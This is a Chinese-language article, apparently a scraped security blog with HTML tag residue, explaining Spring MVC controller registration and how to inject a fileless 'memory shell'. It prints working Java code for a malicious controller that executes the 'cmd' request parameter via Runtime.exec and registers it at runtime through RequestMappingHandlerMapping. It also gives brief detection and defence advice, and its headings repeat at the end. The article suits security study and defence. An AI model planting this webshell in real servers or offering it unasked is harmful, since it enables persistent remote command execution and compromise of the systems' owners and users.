Spring Controller 内存马技术深入解析<\/h1>

一、Spring Controller 基础概念<\/h2>

1.1 Spring Controller 定义与作用<\/h3>
Spring Controller 是 Spring MVC 框架中的核心组件，作为用户请求和业务逻辑之间的桥梁，主要负责：<\/p>
处理由 DispatcherServlet 分发的请求<\/li>
执行相应的业务逻辑<\/li>
将数据传递给视图层<\/li>
生成最终响应<\/li> <\/ul>
1.2 Controller 实现方式<\/h3>
最常见的实现方式是通过在类上添加 @Controller<\/code> 注解，Spring 会自动检测并注册该类为 Controller。方法级别使用：<\/p>

@RequestMapping<\/code>：通用请求映射<\/li>
@GetMapping<\/code>：处理 GET 请求<\/li>
@PostMapping<\/code>：处理 POST 请求<\/li>
<\/ul>
1.3 基础示例<\/h3>
@Controller<\/span>
<\/span><\/span>public<\/span> class<\/span> UserController<\/span> {<\/span>
<\/span><\/span>    @RequestMapping<\/span>(<\/span>"\/quick"<\/span>)<\/span>
<\/span><\/span>    public<\/span> String quick<\/span>()<\/span> {<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"quick running."<\/span>);<\/span>
<\/span><\/span>        return<\/span> "\/WEB-INF\/pages\/success.jsp"<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>二、Spring Controller 注册流程<\/h2>
2.1 整体注册流程<\/h3>

识别 Controller<\/strong>：Spring 容器扫描所有类，识别 @Controller<\/code> 或 @RequestMapping<\/code> 注解<\/li>
创建请求映射<\/strong>：解析方法上的映射注解，建立 URL 与方法的映射关系<\/li>
存储映射关系<\/strong>：将映射信息存储在 RequestMappingHandlerMapping<\/code> 的内部数据结构中<\/li>
<\/ol>
2.2 源码级分析<\/h3>
2.2.1 初始化阶段<\/h4>
protected<\/span> void<\/span> initHandlerMethods<\/span>()<\/span> {<\/span>
<\/span><\/span>    String[]<\/span> var1 =<\/span> this<\/span>.<\/span>getCandidateBeanNames<\/span>();<\/span> \/\/ 获取所有bean名称
<\/span><\/span><\/span><\/span>    for<\/span>(<\/span>int<\/span> var3 =<\/span> 0<\/span>;<\/span> var3 <<\/span> var2;<\/span> ++<\/span>var3)<\/span> {<\/span>
<\/span><\/span>        String beanName =<\/span> var1[<\/span>var3];<\/span>
<\/span><\/span>        if<\/span> (!<\/span>beanName.<\/span>startsWith<\/span>(<\/span>"scopedTarget."<\/span>))<\/span> {<\/span>
<\/span><\/span>            this<\/span>.<\/span>processCandidateBean<\/span>(<\/span>beanName);<\/span> \/\/ 处理候选bean
<\/span><\/span><\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.2 候选Bean处理<\/h4>
protected<\/span> void<\/span> processCandidateBean<\/span>(<\/span>String beanName)<\/span> {<\/span>
<\/span><\/span>    Class<?><\/span> beanType =<\/span> this<\/span>.<\/span>obtainApplicationContext<\/span>().<\/span>getType<\/span>(<\/span>beanName);<\/span>
<\/span><\/span>    if<\/span> (<\/span>beanType !=<\/span> null<\/span> &&<\/span> this<\/span>.<\/span>isHandler<\/span>(<\/span>beanType))<\/span> {<\/span> \/\/ 检查是否为Handler
<\/span><\/span><\/span><\/span>        this<\/span>.<\/span>detectHandlerMethods<\/span>(<\/span>beanName);<\/span> \/\/ 检测处理方法
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>protected<\/span> boolean<\/span> isHandler<\/span>(<\/span>Class<?><\/span> beanType)<\/span> {<\/span>
<\/span><\/span>    return<\/span> AnnotatedElementUtils.<\/span>hasAnnotation<\/span>(<\/span>beanType,<\/span> Controller.<\/span>class<\/span>)<\/span> ||<\/span> 
<\/span><\/span>           AnnotatedElementUtils.<\/span>hasAnnotation<\/span>(<\/span>beanType,<\/span> RequestMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.3 方法检测与注册<\/h4>
protected<\/span> void<\/span> detectHandlerMethods<\/span>(<\/span>Object handler)<\/span> {<\/span>
<\/span><\/span>    Class<?><\/span> handlerType =<\/span> ...;<\/span> \/\/ 获取handler类型
<\/span><\/span><\/span><\/span>    Map<<\/span>Method,<\/span> T><\/span> methods =<\/span> MethodIntrospector.<\/span>selectMethods<\/span>(<\/span>userType,<\/span> (<\/span>method)<\/span> -><\/span> {<\/span>
<\/span><\/span>        return<\/span> this<\/span>.<\/span>getMappingForMethod<\/span>(<\/span>method,<\/span> userType);<\/span> \/\/ 获取方法映射
<\/span><\/span><\/span><\/span>    });<\/span>
<\/span><\/span>    methods.<\/span>forEach<\/span>((<\/span>method,<\/span> mapping)<\/span> -><\/span> {<\/span>
<\/span><\/span>        Method invocableMethod =<\/span> AopUtils.<\/span>selectInvocableMethod<\/span>(<\/span>method,<\/span> userType);<\/span>
<\/span><\/span>        this<\/span>.<\/span>registerHandlerMethod<\/span>(<\/span>handler,<\/span> invocableMethod,<\/span> mapping);<\/span> \/\/ 注册方法
<\/span><\/span><\/span><\/span>    });<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2.4 最终注册<\/h4>
protected<\/span> void<\/span> registerHandlerMethod<\/span>(<\/span>Object handler,<\/span> Method method,<\/span> T mapping)<\/span> {<\/span>
<\/span><\/span>    this<\/span>.<\/span>mappingRegistry<\/span>.<\/span>register<\/span>(<\/span>mapping,<\/span> handler,<\/span> method);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> void<\/span> register<\/span>(<\/span>T mapping,<\/span> Object handler,<\/span> Method method)<\/span> {<\/span>
<\/span><\/span>    \/\/ 线程安全处理
<\/span><\/span><\/span><\/span>    this<\/span>.<\/span>readWriteLock<\/span>.<\/span>writeLock<\/span>().<\/span>lock<\/span>();<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        HandlerMethod handlerMethod =<\/span> createHandlerMethod(<\/span>handler,<\/span> method);<\/span>
<\/span><\/span>        this<\/span>.<\/span>mappingLookup<\/span>.<\/span>put<\/span>(<\/span>mapping,<\/span> handlerMethod);<\/span> \/\/ 存储映射关系
<\/span><\/span><\/span><\/span>        \/\/ 其他注册逻辑...
<\/span><\/span><\/span><\/span>        this<\/span>.<\/span>registry<\/span>.<\/span>put<\/span>(<\/span>mapping,<\/span> new<\/span> MappingRegistration(...));<\/span>
<\/span><\/span>    }<\/span> finally<\/span> {<\/span>
<\/span><\/span>        this<\/span>.<\/span>readWriteLock<\/span>.<\/span>writeLock<\/span>().<\/span>unlock<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>三、内存马实现原理<\/h2>
3.1 核心思路<\/h3>
利用 Spring MVC 的注册机制，动态注册恶意 Controller，无需重启服务即可生效。<\/p>
3.2 实现步骤<\/h3>
3.2.1 创建恶意类<\/h4>
public<\/span> class<\/span> Evil<\/span> {<\/span>
<\/span><\/span>    public<\/span> void<\/span> cmd<\/span>()<\/span> {<\/span>
<\/span><\/span>        \/\/ 获取当前请求和响应
<\/span><\/span><\/span><\/span>        HttpServletRequest request =<\/span> ((<\/span>ServletRequestAttributes)<\/span> 
<\/span><\/span>            (<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>())).<\/span>getRequest<\/span>();<\/span>
<\/span><\/span>        HttpServletResponse response =<\/span> ((<\/span>ServletRequestAttributes)<\/span> 
<\/span><\/span>            (<\/span>RequestContextHolder.<\/span>currentRequestAttributes<\/span>())).<\/span>getResponse<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 获取并执行命令
<\/span><\/span><\/span><\/span>        String command =<\/span> request.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        if<\/span> (<\/span>command !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>                throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3.2.2 获取关键对象<\/h4>
\/\/ 获取Spring上下文
<\/span><\/span><\/span><\/span>WebApplicationContext context =<\/span> (<\/span>WebApplicationContext)<\/span> 
<\/span><\/span>    RequestContextHolder.<\/span>currentRequestAttributes<\/span>().<\/span>getAttribute<\/span>(<\/span>
<\/span><\/span>        "org.springframework.web.servlet.DispatcherServlet.CONTEXT"<\/span>,<\/span> 0<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>\/\/ 获取请求映射处理器
<\/span><\/span><\/span><\/span>RequestMappingHandlerMapping requestMappingHandlerMapping =<\/span> 
<\/span><\/span>    context.<\/span>getBean<\/span>(<\/span>RequestMappingHandlerMapping.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.2.3 构造映射参数<\/h4>
\/\/ 获取恶意方法
<\/span><\/span><\/span><\/span>Method method =<\/span> InjectedController.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造URL路径条件
<\/span><\/span><\/span><\/span>PatternsRequestCondition url =<\/span> new<\/span> PatternsRequestCondition(<\/span>"\/evilcontroller"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造请求方法条件（空表示支持所有方法）
<\/span><\/span><\/span><\/span>RequestMethodsRequestCondition condition =<\/span> new<\/span> RequestMethodsRequestCondition();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造完整的RequestMapping信息
<\/span><\/span><\/span><\/span>RequestMappingInfo info =<\/span> new<\/span> RequestMappingInfo(<\/span>
<\/span><\/span>    url,<\/span> condition,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 实例化恶意Controller
<\/span><\/span><\/span><\/span>InjectedController injectedController =<\/span> new<\/span> InjectedController();<\/span>
<\/span><\/span><\/code><\/pre>3.2.4 注册恶意Controller<\/h4>
\/\/ 注册映射
<\/span><\/span><\/span><\/span>requestMappingHandlerMapping.<\/span>registerMapping<\/span>(<\/span>
<\/span><\/span>    info,<\/span> injectedController,<\/span> method);<\/span>
<\/span><\/span><\/code><\/pre>四、防御措施<\/h2>
4.1 检测方法<\/h3>


静态检测<\/strong>：<\/p>

检查是否有非常规的Controller注册<\/li>
检查RequestMappingHandlerMapping中的异常映射<\/li>
<\/ul>
<\/li>

动态检测<\/strong>：<\/p>

监控运行时新增的URL映射<\/li>
检查可疑的请求处理器<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 防护建议<\/h3>

禁用不必要的HTTP方法<\/li>
实施严格的URL访问控制<\/li>
定期扫描和审查Controller注册表<\/li>
使用安全框架如Spring Security进行防护<\/li>
监控Runtime.exec等危险方法的调用<\/li>
<\/ol>
五、技术要点总结<\/h2>

核心机制<\/strong>：利用Spring MVC的HandlerMapping动态注册机制<\/li>
关键类<\/strong>：

RequestMappingHandlerMapping<\/code>：核心映射处理器<\/li>
RequestMappingInfo<\/code>：封装映射信息<\/li>
HandlerMethod<\/code>：封装处理方法<\/li>
<\/ul>
<\/li>
持久性<\/strong>：内存马存活于应用生命周期中，重启后失效<\/li>
隐蔽性<\/strong>：无文件落地，仅存在于内存中<\/li>
<\/ol>
六、扩展思考<\/h2>


变种可能性<\/strong>：<\/p>

结合其他Spring组件如Interceptor实现更隐蔽的攻击<\/li>
利用反射绕过安全检查<\/li>
<\/ul>
<\/li>

高级利用<\/strong>：<\/p>

结合反序列化漏洞实现远程注入<\/li>
实现多级内存驻留<\/li>
<\/ul>
<\/li>

检测对抗<\/strong>：<\/p>

通过字节码增强技术检测动态注册<\/li>
使用RASP进行运行时防护<\/li>
<\/ul>
<\/li>
<\/ol>
本技术文档详细阐述了Spring Controller内存马的实现原理和技术细节，仅供安全研究使用，请勿用于非法用途。<\/p>
Spring Controller 内存马技术深入解析<\/h1>

一、Spring Controller 基础概念<\/h2>

二、Spring Controller 注册流程<\/h2>

2.2 源码级分析<\/h3>

三、内存马实现原理<\/h2>

3.1 核心思路<\/h3> 利用 Spring MVC 的注册机制，动态注册恶意 Controller，无需重启服务即可生效。<\/p>

3.2 实现步骤<\/h3>

四、防御措施<\/h2>

3.1 核心思路<\/h3>
利用 Spring MVC 的注册机制，动态注册恶意 Controller，无需重启服务即可生效。<\/p>
